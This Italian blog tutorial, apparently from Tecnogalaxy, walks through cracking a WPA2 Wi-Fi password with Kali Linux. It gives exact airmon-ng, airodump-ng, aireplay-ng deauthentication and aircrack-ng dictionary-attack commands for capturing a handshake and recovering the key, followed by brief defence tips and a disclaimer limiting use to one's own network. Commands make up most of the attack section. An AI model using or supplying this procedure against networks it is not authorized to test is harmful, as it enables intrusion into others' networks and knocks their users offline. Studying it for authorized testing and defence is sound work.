Cari lettori di Tecnogalaxy, oggi vedremo una tecnica per hackerare rete wireless con protezione WPA2. I router di ultima generazione impostano di default l’autentificazione WPA o WPA2.

Gli attacchi alle reti Wi-Fi sono sempre più numerosi, quindi vengono potenziate e rese più sicure creando nuovi standard o nuovi algoritmi per crittografare le reti. Ognuno di essi presenta degli svantaggi e dei vantaggi che trovi elencati di seguito:

  • WEP: Usa l’algoritmo di cifratura stream RC4 ed è un vecchio standard con molte vulnerabilità;
  • WPA: Utilizza il protocollo TKIP e MIC con crittografia AES;
  • WPA2: detto anche IEEE 802.11i, utilizza AES (128 bit) e CCMP per la crittografia;

Una volta violata la rete wireless il malintenzionato potrebbe utilizzare questi tipi di attacchi:

  • Man-In-The-Middle: In questo attacco, l’hacker intercetta le comunicazioni che avvengono tra computer dell’obiettivo e il server, sia le informazioni richieste che quelle ricevute;
  • Denial-of-service: L’attacco Denial of service è un attacco brutale che causa la disconnessione di tutti gli utenti dalla rete o della vittima designata;
  • Social-engineering: Questo tipo di attacco è uno dei più prevalenti al giorno d’oggi. L’attaccante cerca di carpire informazioni direttamente dall’interessato. È uno degli attacchi più difficili da rilevare;

Passiamo al divertimento. Come sempre ci viene incontro il nostro caro amico Kali Linux.

Hackerare rete wireless WPA2

Per fare questo tipo di test oltre a Kali Linux, dobbiamo utilizzare una scheda di rete che supporti il monitor mode, io utilizzo una scheda Alfa.

Iniziamo aprendo una shell, scriviano il seguente comando:

airmon-ng

Adesso dobbiamo impostare la nostra scheda di rete in modalità monitor mode:

airmon-ng start wlan0

Controlliamo se la nostra scheda è in monitor mode:

airmon-ng

Perfetto la nostra scheda adesso si chiamerà wlan0mon.

Facciamo partire la scansione per vedere le reti wireless nelle nostre vicinanze

airodump-ng wlan0mon

Nella parte superiore della videata mostrata dal tool potremo visualizzare tutte le wireless trovate, mentre nella parte inferiore i client collegati a quelle reti.

Adesso apriamo una shell perchè dobbiamo intercettare e salvarci la famosa stretta di mano.

Scriviamo:

airodump-ng -c 1 -w /root/Scrivania/wlan0mon.cap --bssid A1:00:01:02:03:04:05 wlan0mon

Per fare ciò dobbiamo indurre i client collegati a disconnettersi scrivendo il seguente comando:

aireplay-ng -0 2 -a A4:00:01:02:03:04 -c 18:21:22:23:24:11 wlan0mon

-a = BSSID dell’accespoint

-c = MAC ADDRESS del client collegato.

Quando viene presa la famosa stretta di mano, possiamo fermare il tool, ci accorgiamo perche in alto a destra della finestra di fianco alla voce handshake vedremo scritti dei numeri.

A questo punto potremo far partire aircrack-ng, apriamo una shell e scriviamo:

aircrack-ng -a2 -b A4:00:01:02:03:04 -w /root/Scrivania/password.txt /root/Scrivania/*.cap

Il tempo del cracking dipende dalla grandezza del dizionario e dalla potenza del nostro computer. Se il dizionario utilizzato è popolato dalle password più utilizzate avremo raggiunto l’obbiettivo del nostro test 😊

Come difendersi dall’hacking di reti wireless

Come sempre tenere aggiornato il proprio router, se datato acquistarne uno di ultima generazione.

Disattivare il WPS, cambiare subito la password di default del router e quella per collegarsi alla rete wireless, impostandone una complessa, ad esempio con caratteri [email protected]#\ etc…

Installare un software sul PC o un app sul device che effettua una scansione della vostra rete.

Nel caso trovasse un IP associato ad un device/computer non vostro, significa che la vostra rete è stata violata, spegnere subito il router.

Come sempre fatene buon uso facendo dei test sulla vostra rete , fare questi test su reti altrui è illegale.

Al prossimo articolo.

N.B.: Non mi assumo nessuna responsabilità dell’uso che farete della guida, in quanto stilata per uso didattico e formativo.

Giorgio Perego

IT Manager

Leggi anche:

Ti è stato di aiuto questo articolo? Aiuta questo sito a mantenere le varie spese con una donazione a piacere cliccando su questo link. Grazie!

Seguici anche su Telegram cliccando su questo link per rimanere sempre aggiornato sugli ultimi articoli e le novità riguardanti il sito.

Se vuoi fare domande o parlare di tecnologia puoi entrare nel nostro gruppo Telegram cliccando su questo link.

© Tecnogalaxy.it - Vietato riprodurre il contenuto di questo articolo.